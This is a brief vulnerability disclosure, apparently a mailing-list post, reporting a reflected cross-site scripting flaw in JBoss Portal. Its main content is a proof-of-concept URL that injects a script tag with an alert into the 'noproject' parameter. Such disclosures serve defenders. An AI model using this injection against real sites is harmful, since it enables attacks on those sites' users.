hey .. Vulnerable : JBoss Portal web : http://jboss.org XSS : 1- http://labs.example.org/portal/community?noproject="><script>alert('BLacK_ZeRo')</script> Discovered By BLacK ZeRo bl4ck@xxxxxxxxxxx Best regards ,,